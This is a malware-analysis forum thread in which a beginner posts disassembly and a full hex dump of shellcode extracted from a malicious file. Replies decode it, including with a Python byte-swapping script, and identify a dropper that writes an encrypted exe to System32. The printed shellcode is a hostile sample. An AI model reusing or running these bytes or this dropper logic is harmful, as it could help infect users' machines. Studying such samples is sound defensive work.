Help understanding she11code asm

Hello everyone, I am new to reversing and hoping someone can point me in the right direction. I have extracted she11code from a bad file and converted the code to ASM. What I am having trouble getting to work/understanding is how they are encrypting/decrypting the embedded file in order to make it harder to extract. I tried XORing by 8 and still could not see anything useful. Any help on how to proceed would be greatly appreciated.
Thanks in advance for the help.

version = 7
00000000 sbb byte[ebx+0x9318ccd0],dl
00000006 ror ah,0x1
00000008 sbb byte[ebx+0x9318ccd0],dl
0000000e ror ah,0x1
00000010 sbb byte[ebx+0x9318ccd0],dl
00000016 ror ah,0x1
00000018 sbb byte[ebx+0x9318ccd0],dl
0000001e ror ah,0x1
00000020 sbb byte[ebx+0x9318ccd0],dl
00000026 ror ah,0x1
00000028 sbb byte[ebx+0x9318ccd0],dl
0000002e ror ah,0x1
00000030 sbb byte[ebx+0x9318ccd0],dl
00000036 ror ah,0x1
00000038 sbb byte[ebx+0x9318ccd0],dl
0000003e ror ah,0x1
00000040 sbb byte[ebx+0x9318ccd0],dl
00000046 ror ah,0x1
00000048 sbb byte[ebx+0x9318ccd0],dl
0000004e ror ah,0x1
00000050 sbb byte[ebx+0x9318ccd0],dl
00000056 ror ah,0x1
00000058 sbb byte[ebx+0x9318ccd0],dl
0000005e ror ah,0x1
00000060 sbb byte[ebx+0x9318ccd0],dl
00000066 ror ah,0x1
00000068 sbb byte[ebx+0x9318ccd0],dl
0000006e ror ah,0x1
00000070 sbb byte[ebx+0x9318ccd0],dl
00000076 ror ah,0x1
00000078 sbb byte[ebx+0x9318ccd0],dl
0000007e ror ah,0x1
00000080 sbb byte[ebx+0x9318ccd0],dl
00000086 ror ah,0x1
00000088 sbb byte[ebx+0x9318ccd0],dl
0000008e ror ah,0x1

version = 8
00000000 or dl,ah
00000002 cdq
00000003 xor al,0x8
00000005 loop 0xffffffa0
00000007 xor al,0x8
00000009 loop 0xffffffa4
0000000b xor al,0x8
0000000d loop 0xffffffa8
0000000f xor al,0x8
00000011 loop 0xffffffac
00000013 xor al,0x8
00000015 loop 0xffffffb0
00000017 xor al,0x8
00000019 loop 0xffffffb4
0000001b xor al,0x8
0000001d loop 0xffffffb8
0000001f xor al,0x8
00000021 loop 0xffffffbc
00000023 xor al,0x8
00000025 loop 0xffffffc0
00000027 xor al,0x8
00000029 loop 0xffffffc4
0000002b xor al,0x8
0000002d loop 0xffffffc8
0000002f xor al,0x8
00000031 loop 0xffffffcc
00000033 xor al,0x8
00000035 loop 0xffffffd0
00000037 xor al,0x8
00000039 loop 0xffffffd4
0000003b xor al,0x8
0000003d loop 0xffffffd8
0000003f xor al,0x8
00000041 loop 0xffffffdc
00000043 xor al,0x8
00000045 loop 0xffffffe0
00000047 xor al,0x8
00000049 loop 0xffffffe4
0000004b xor al,0x8
0000004d loop 0xffffffe8
0000004f xor al,0x8
00000051 loop 0xffffffec
00000053 xor al,0x8
00000055 loop 0xfffffff0
00000057 xor al,0x8
00000059 loop 0xfffffff4
0000005b xor al,0x8
0000005d loop 0xfffffff8
0000005f xor al,0x8
00000061 loop 0xfffffffc
00000063 xor al,0x8
00000065 loop 0x0
00000067 xor al,0x8
00000069 loop 0x4
0000006b xor al,0x8
0000006d loop 0x8
0000006f xor al,0x8
00000071 loop 0xc
00000073 xor al,0x8
00000075 loop 0x10
00000077 xor al,0x8
00000079 loop 0x14
0000007b xor al,0x8
0000007d loop 0x18
0000007f xor al,0x8
00000081 loop 0x1c
00000083 xor al,0x8
00000085 loop 0x20
00000087 xor al,0x8
00000089 loop 0x24
0000008b xor al,0x8
0000008d loop 0x28

Shellcode review

1) It's decrypting something. There is no jmp, no call, no API hash, nothing... It's just decrypting something in a heavy way!

2) Send complete shellcode

3) Send bytes in HEX. Send only HEX string of entire shellcode, like this: AABBCCDDEEFF01 etc.

full code

Thanks for the reply. I've pasted the entire code below. Any help/tips on how to acquire/decrypt the embedded malware would be greatly appreciated.

Thanks again for your time and help.


e8fc00440000458b8b3c057c01788bef184f5f8b012049eb348b018b31ee99c084ac74c0c1070dcac201f4eb543b0424e5755f8b012466eb0c8b8b4b1c5feb011c8b018b89eb245cc304315f60f66456468b8b300c40708bad1c688b890883f86ac068508af05f0498688afe570ee7ff3a43575c4e494f445357735c73796574336d5c326163636c652e657841009090


9318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd0

9318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd0

2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a

e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499

4ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b00

e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499

4ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b00

e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499

when you hexdecode the first

When you hex-decode the first line, we see "....ÿ:CW\NIODSWs\syet3m\2accle.exA...", probably a hint to code a decryptor.
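An added example, not code from the thread, that hex-decodes the first line pasted above and compares it with the same bytes after every adjacent pair is swapped back, on the assumption (mine, not the poster's) that the dump was written out as little-endian 16-bit words. In the swapped form the buffer opens with the usual cld; call prologue and the scrambled text comes out as a plain System32 path, which is worth checking before spending time on XOR keys.

```python
import re

# Constructed input: the first hex line from the "full code" post above,
# copied verbatim (144 bytes).
FIRST_LINE = (
    "e8fc00440000458b8b3c057c01788bef184f5f8b012049eb348b018b31ee99c084ac74"
    "c0c1070dcac201f4eb543b0424e5755f8b012466eb0c8b8b4b1c5feb011c8b018b89eb"
    "245cc304315f60f66456468b8b300c40708bad1c688b890883f86ac068508af05f0498"
    "688afe570ee7ff3a43575c4e494f445357735c73796574336d5c326163636c652e6578"
    "41009090"
)

def decode_dump(hex_line: str) -> bytes:
    """Hex-decode one pasted line into raw bytes (whitespace tolerated)."""
    return bytes.fromhex("".join(hex_line.split()))

def swap_adjacent_bytes(data: bytes) -> bytes:
    """Swap every byte pair (b0 b1 -> b1 b0). This undoes a dump that was
    written out as little-endian 16-bit words; a trailing odd byte is kept."""
    out = bytearray(data)
    n = len(data) - len(data) % 2
    out[0:n:2], out[1:n:2] = data[1:n:2], data[0:n:2]
    return bytes(out)

def printable_strings(data: bytes, min_len: int = 6) -> list[str]:
    """Return runs of at least min_len printable ASCII bytes, like strings(1)."""
    pattern = re.compile(rb"[\x20-\x7e]{" + str(min_len).encode() + b",}")
    return [m.decode("ascii") for m in pattern.findall(data)]

def analyze(hex_line: str) -> dict:
    """Compare the dump as pasted with its byte-swapped form: which one has a
    sensible prologue and which one yields a readable string."""
    raw = decode_dump(hex_line)
    fixed = swap_adjacent_bytes(raw)
    return {
        "as_pasted_head": raw[:4].hex(),
        "as_pasted_strings": printable_strings(raw),
        "swapped_head": fixed[:4].hex(),
        "swapped_strings": printable_strings(fixed),
        # fc e8 = cld; call ..., the common opening of position-independent
        # Windows shellcode that learns its own address from the return value
        "swapped_starts_with_cld_call": fixed[:2] == b"\xfc\xe8",
    }

if __name__ == "__main__":
    for key, value in analyze(FIRST_LINE).items():
        print(f"{key}: {value}")
```

The repeated 4-byte patterns on the other lines stay meaningless under both readings, so the swap only tells you how the first line should be disassembled, not what the filler is.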

Analyze results

Hi

Analyzing shellcode without the entire exploit is not something 100% possible. This shellcode has a hardcoded System32 path with an exe name:
C:\Windows\System32\caclA.exe

It's not something good; it seems a noob coded this shellcode. Instead of using the GetSystemDirectory API with a simple call, the shellcode writer decided to write it manually.

So if you don't have a C:\Windows\System32 folder I think it will not work!

It tries to call
KERNEL32.GlobalLock
KERNEL32.GlobalSize

But I have not determined 100% what it tries to do; also it has a lot of

01001248 5C POP ESP
01001249 66:6A 2C PUSH 2C
0100124C 5C POP ESP
0100124D 66:6A 2C PUSH 2C
01001250 5C POP ESP
01001251 66:6A 2C PUSH 2C
01001254 5C POP ESP
01001255 66:6A 2C PUSH 2C
01001258 5C POP ESP
01001259 66:6A 2C PUSH 2C
0100125C 5C POP ESP
0100125D 66:6A 2C PUSH 2C
01001260 5C POP ESP
01001261 66:6A 2C PUSH 2C
01001264 5C POP ESP
01001265 66:6A 2C PUSH 2C
01001268 5C POP ESP
01001269 66:6A 2C PUSH 2C
0100126C 5C POP ESP
0100126D 66:6A 2C PUSH 2C
01001270 5C POP ESP
01001271 66:6A 2C PUSH 2C
01001274 5C POP ESP
01001275 66:6A 2C PUSH 2C
01001278 5C POP ESP
01001279 66:6A 2C PUSH 2C
0100127C 5C POP ESP
0100127D 66:6A 2C PUSH 2C
01001280 5C POP ESP
01001281 66:6A 2C PUSH 2C
01001284 5C POP ESP
01001285 66:6A 2C PUSH 2C
01001288 5C POP ESP
01001289 66:6A 2C PUSH 2C
0100128C 5C POP ESP
0100128D 66:6A 2C PUSH 2C
01001290 5C POP ESP
01001291 66:6A 2C PUSH 2C
01001294 5C POP ESP
01001295 66:6A 2C PUSH 2C
01001298 5C POP ESP
01001299 66:6A 2C PUSH 2C
0100129C 5C POP ESP
0100129D 66:6A 2C PUSH 2C
010012A0 5C POP ESP
010012A1 66:6A 2C PUSH 2C
010012A4 5C POP ESP
010012A5 66:6A 2C PUSH 2C
010012A8 5C POP ESP
010012A9 66:6A 2C PUSH 2C
010012AC 5C POP ESP
010012AD 66:6A 2C PUSH 2C
010012B0 5C POP ESP
010012B1 66:6A 2C PUSH 2C
010012B4 5C POP ESP
010012B5 66:6A 2C PUSH 2C
010012B8 5C POP ESP
010012B9 66:6A 2C PUSH 2C
010012BC 5C POP ESP
010012BD 66:6A 2C PUSH 2C
010012C0 5C POP ESP
010012C1 66:6A 2C PUSH 2C
010012C4 5C POP ESP
010012C5 66:6A 2C PUSH 2C
010012C8 5C POP ESP
010012C9 66:6A 2C PUSH 2C
010012CC 5C POP ESP
010012CD 66:6A 2C PUSH 2C
010012D0 5C POP ESP
010012D1 66:6A 2C PUSH 2C
010012D4 5C POP ESP

It doesn't mean something normal...

I should have the entire exploit to analyze the exploit, shellcode and what it does... But 100% it has an embedded exe file, it writes to the system32 folder, the exe is encrypted and it decrypts the file.

Also I can't see a call to WinExec, so even after decrypting or writing, I can't see any execution code.

Also, maybe you cut the shellcode wrong, or I should have the original exploit file to analyze.

Regards

samp

What's your email address I can send to?

xanalyzer [at] yahoo [dot]

xanalyzer [at] yahoo [dot] com

PI

Maybe the unencrypted she11code is injected into a process and executed with a ResumeThread call or something. The use of WinExec is actually fairly rare these days.